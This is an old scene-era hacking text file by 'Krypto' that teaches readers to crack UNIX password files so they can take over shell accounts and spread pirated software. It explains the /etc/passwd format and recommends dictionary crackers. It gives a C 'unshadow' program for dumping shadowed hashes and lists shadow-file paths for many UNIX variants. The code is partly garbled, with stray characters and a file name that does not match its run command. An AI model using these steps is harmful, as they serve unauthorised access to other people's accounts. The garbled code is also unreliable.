|
+----------------------------------------------------------------------------+ ¦ Author(s): ¦ Krypto ¦ +---------------+------------------------------------------------------------¦ ¦ Subject: ¦ Cracking that "Passwd" File ¦ +----------------------------------------------------------------------------+ ______________________________________________________________________________ ______________________________________________________________________________ +----------------------------------------------------------------------------+ ¦ R E A L I T Y C H E C K N E T W O R K! ¦ +----------------------------------------------------------------------------¦ ¦____________________________________________________________________________¦ ¦____________________________________________________________________________¦ +----------------------------------------------------------------------------¦ ¦ ¦ ¦ I'm not an amazing "3l33t3" hacker, but I have picked up some things ¦ ¦ over the course of my scene life. ¦ ¦ ¦ ¦ At times, many of us are without Internet shell account, therefore ¦ ¦ inhibiting our ablility to spread the warez. Many of us seek to remedy ¦ ¦ this by cracking Internet shell accounts and doing as we please with ¦ ¦ them, mainly spreading. Here, I'll show you the basic process in ¦ ¦ cracking UNIX accounts so that you can better your efforts in spreading ¦ ¦ them warez. ¦ ¦ ¦ ¦ Most Internet shells are UNIX based and therefore store the password ¦ ¦ to all the users in a file called the "passwd" file. This is usually ¦ ¦ located at /etc/passwd. The basic structure of the passwd file contains ¦ ¦ lines looking like this: ¦ ¦ ¦ ¦ bgates:VKa0XuF8KB4sc:5604:12:William Gates:/home/bgates:/bin/bash ¦ ¦ ¦ ¦ Essentially, the line is broken down into these parts: ¦ ¦ ¦ ¦ Username: bgates ¦ ¦ Encrypted Password: VKa0XuF8KB4sc ¦ ¦ User number: 5604 ¦ ¦ Group Number: 12 ¦ ¦ Real Name (usually): William Gates ¦ ¦ Home Directory: /home/bgates ¦ ¦ Type of Shell: /bin/bash ¦ ¦ ¦ ¦ Your main concern is to crack each encrypted password for every ¦ ¦ user. Because the encryption function is only unidirectional, you ¦ ¦ cannot decrypt the encrypted password. You must run a cracking program ¦ ¦ which encrypts words then compares the encrypted word with the password. ¦ ¦ If they match you now have cracked the password. ¦ ¦ ¦ ¦ Because cracking relies on words that are encrypted, you MUST have a ¦ ¦ wordlist. For beginners, a basic wordlist can be found as a dictionary ¦ ¦ file supplied as a part of UNIX. The more the comprehensive the ¦ ¦ wordlist is, the better your chances of successfully cracking passwords. ¦ ¦ Next, you'll need a passwd cracker, which comes under numerous versions ¦ ¦ depending on your operating system. Currently the best are: ¦ ¦ ¦ ¦ Software Operating System ¦ ¦ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ¦ ¦ CrackerJack v1.4 DOS ¦ ¦ Crack UNIX ¦ ¦ ¦ ¦ Run the "cracking" program and feed your wordlist and passwd file ¦ ¦ into the program. And watch as it "cracks" the passwords. ¦ ¦ ¦ ¦ Sometimes you'll discover that the passwd file is incomplete or ¦ ¦ looks something like this: ¦ ¦ ¦ ¦ bgates:*:5604:12:William Gates:/home/bgates:/bin/bash ¦ ¦ ¦ ¦ The * is called the token and means that the passwd file has been ¦ ¦ shadowed. Password shadowing is a security system where the encrypted ¦ ¦ password field of /etc/passwd is replaced with a special token and the ¦ ¦ encrypted password is stored in a separate file which is not readable by ¦ ¦ normal system users. ¦ ¦ ¦ ¦ In order to defeat this, you'll need to write a C program and ¦ ¦ compile it similar to this: ¦ ¦ ¦ ¦ Cut out the program at the bottom and save as "shadow.c" ¦ ¦ ¦ ¦ Run "gcc shadow.c -o shadow" or "cc shadow.c -o shadow" ¦ ¦ ¦ ¦ Run "./shadowpw >> password" ¦ ¦ ¦ ¦ "password" should be your deshadowed password list. ¦ ¦ ¦ ¦ If you have any problems, or need any help whatsoever... DO NOT ¦ ¦ CONTACT ME! ¦ ¦ ¦ +----------------------------------------------------------------------------¦ ¦ ¦ ¦ Sample Unshadow Program ¦ ¦ ~~~~~~~~~~~~~~~~~~~~~~~ ¦ ¦ ¦ ¦ struct SHADOWPW { /* see getpwent(3) */ ¦ ¦ char *pw_name; ¦ ¦ char *pw_passwd; ¦ ¦ int pw_uid; ¦ ¦ int pw_gid; ¦ ¦ int pw_quota; ¦ ¦ char *pw_comment; ¦ ¦ char *pw_gecos; ¦ ¦ char *pw_dir; ¦ ¦ char *pw_shell; ¦ ¦ }; ¦ ¦ struct passwd *getpwent(), *getpwuid(), *getpwnam(); ¦ ¦ ¦ ¦ #ifdef elxsis? ¦ ¦ ¦ ¦ /* Name of the shadow password file. Contains password and aging info * ¦ ¦ ¦ ¦ #define SHADOWPW "/etc/shadowpw" ¦ ¦ #define SHADOWPW_PAG "/etc/shadowpw.pag" ¦ ¦ #define SHADOWPW_DIR "/etc/shadowpw.dir" ¦ ¦ /* ¦ ¦ * Shadow password file pwd->pw_gecos field contains: ¦ ¦ * ¦ ¦ * <type>,<period>,<last_time>,<old_time>,<old_password> ¦ ¦ * ¦ ¦ * <type> = Type of password criteria to enforce (type int). ¦ ¦ * BSD_CRIT (0), normal BSD. ¦ ¦ * STR_CRIT (1), strong passwords. ¦ ¦ * <period> = Password aging period (type long). ¦ ¦ * 0, no aging. ¦ ¦ * else, number of seconds in aging period. ¦ ¦ * <last_time> = Time (seconds from epoch) of the last password ¦ ¦ * change (type long). ¦ ¦ * 0, never changed.n ¦ ¦ * <old_time> = Time (seconds from epoch) that the current password ¦ ¦ * was made the <old_password> (type long). ¦ ¦ * 0, never changed.ewromsinm ¦ ¦ * <old_password> = Password (encrypted) saved for an aging <period> t ¦ ¦ * prevent reuse during that period (type char [20]). ¦ ¦ * "*******", no <old_password>. ¦ ¦ */ ¦ ¦ ¦ ¦ /* number of tries to change an aged password */ ¦ ¦ ¦ ¦ #define CHANGE_TRIES 3 ¦ ¦ ¦ ¦ /* program to execute to change passwords */ ¦ ¦ ¦ ¦ #define PASSWD_PROG "/bin/passwd" ¦ ¦ ¦ ¦ /* Name of the password aging exempt user names and max number of entir ¦ ¦ ¦ ¦ #define EXEMPTPW "/etc/exemptpw" ¦ ¦ #define MAX_EXEMPT 100 ¦ ¦ ¦ ¦ ¦ ¦ /* Password criteria to enforce */ ¦ ¦ ¦ ¦ #define BSD_CRIT 0 /* Normal BSD password criteria */ ¦ ¦ #define STR_CRIT 1 /* Strong password criteria */ ¦ ¦ #define MAX_CRIT 1 ¦ ¦ #endif elxsi ¦ ¦ #define NULL 0 ¦ ¦ main() ¦ ¦ { ¦ ¦ struct passwd *p; ¦ ¦ int i; ¦ ¦ for (;1;) {; ¦ ¦ p=getpwent(); ¦ ¦ if (p==NULL) return; ¦ ¦ printpw(p); ¦ ¦ } ¦ ¦ } ¦ ¦ ¦ ¦ printpw(a) ¦ ¦ struct SHADOWPW *a; ¦ ¦ { ¦ ¦ printf("%s:%s:%d:%d:%s:%s:%s\n", ¦ ¦ a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid, ¦ ¦ a->pw_gecos,a->pw_dir,a->pw_shell); ¦ ¦ } ¦ ¦ ¦ ¦ /* SunOS 5.0 /etc/shadow */ ¦ ¦ /* SunOS4.1+c2 /etc/security/passwd.adjunct */ ¦ ¦ ¦ +----------------------------------------------------------------------------¦ ¦ ¦ ¦ The passwd file is located in the following pathes for each system. ¦ ¦ To determine your UNIX system type, enter the following during the UNIX ¦ ¦ prompt: ¦ ¦ ¦ ¦ uname -a ¦ ¦ ¦ ¦ UNIX Paths (Courtesy of 2600) ¦ ¦ ¦ ¦ UNIX Path Token ¦ ¦ ----------------------------------------------------------------- ¦ ¦ AIX 3 /etc/security/passwd ! ¦ ¦ or /tcb/auth/files/<first letter # ¦ ¦ of username>/<username> ¦ ¦ A/UX 3.0s /tcb/files/auth/?/* ¦ ¦ BSD4.3-Reno /etc/master.passwd * ¦ ¦ ConvexOS 10 /etc/shadpw * ¦ ¦ ConvexOS 11 /etc/shadow * ¦ ¦ DG/UX /etc/tcb/aa/user/ * ¦ ¦ EP/IX /etc/shadow x ¦ ¦ HP-UX /.secure/etc/passwd * ¦ ¦ IRIX 5 /etc/shadow x ¦ ¦ Linux 1.1 /etc/shadow * ¦ ¦ OSF/1 /etc/passwd[.dir|.pag] * ¦ ¦ SCO Unix #.2.x /tcb/auth/files/<first letter * ¦ ¦ of username>/<username> ¦ ¦ SunOS4.1+c2 /etc/security/passwd.adjunct ##username ¦ ¦ SunOS 5.0 /etc/shadow ¦ ¦ <optional NIS+ private secure maps/tables/whatever ¦ ¦ System V Release 4.0 /etc/shadow x ¦ ¦ System V Release 4.2 /etc/security/* database ¦ ¦ Ultrix 4 /etc/auth[.dir|.pag] * ¦ ¦ UNICOS /etc/udb * ¦ ¦ ¦ ¦ Well secure systems with shadowed passwords will cause a ¦ ¦ segmentation fault once you've run that sample program. Remember, don't ¦ ¦ come bugging me on IRC if your little hacking escapade doesn't turn out ¦ ¦ like you wanted it to. Well, that's all for now, enjoy your newly ¦ ¦ hacked UNIX accounts and spread them warez. ¦ ¦ ¦ +----------------------------------------------------------------------------¦